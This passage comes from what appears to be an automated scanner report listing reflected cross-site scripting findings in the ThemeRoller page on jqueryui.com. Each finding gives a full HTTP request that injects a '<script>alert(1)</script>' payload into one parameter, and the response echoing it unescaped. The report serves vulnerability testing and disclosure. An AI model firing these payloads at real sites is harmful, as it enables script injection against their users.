Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em988bb"><script>alert(1)</script>8a2c7460782&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent
...[SNIP]...

3.102. http://jqueryui.com/themeroller/ [fwDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb9db"><script>alert(1)</script>ef4213fbf23 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120002

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normaleb9db"><script>alert(1)</script>ef4213fbf23&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&
...[SNIP]...

3.103. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c10"><script>alert(1)</script>093068ed04f was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545a7c10"><script>alert(1)</script>093068ed04f&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pn
...[SNIP]...

3.104. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2f4"><script>alert(1)</script>a6a969de1a8 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
derColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=2222224b2f4"><script>alert(1)</script>a6a969de1a8&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpaci
...[SNIP]...

3.105. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30360"><script>alert(1)</script>3dda5c6d39d was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=88888830360"><script>alert(1)</script>3dda5c6d39d&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6
...[SNIP]...

3.106. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9152e"><script>alert(1)</script>516645a1257 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a9152e"><script>alert(1)</script>516645a1257&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.107. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c31e6"><script>alert(1)</script>bee3a69fc06 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:35:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222c31e6"><script>alert(1)</script>bee3a69fc06&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOp
...[SNIP]...

3.108. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fca1"><script>alert(1)</script>544cc932a96 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff7fca1"><script>alert(1)</script>544cc932a96&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.109. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f31c"><script>alert(1)</script>a87b30d1a5d was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:36:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=4545451f31c"><script>alert(1)</script>a87b30d1a5d&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

3.110. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload deade"><script>alert(1)</script>1bd88013d0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?deade"><script>alert(1)</script>1bd88013d0d=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:34:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&deade"><script>alert(1)</script>1bd88013d0d=1" type="text/css" media="all" />
...[SNIP]...

3.111. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6323d"><script>alert(1)</script>e503afc2b was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6323d"><script>alert(1)</script>e503afc2b&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 12 Dec 2010 14:37:53 GMT
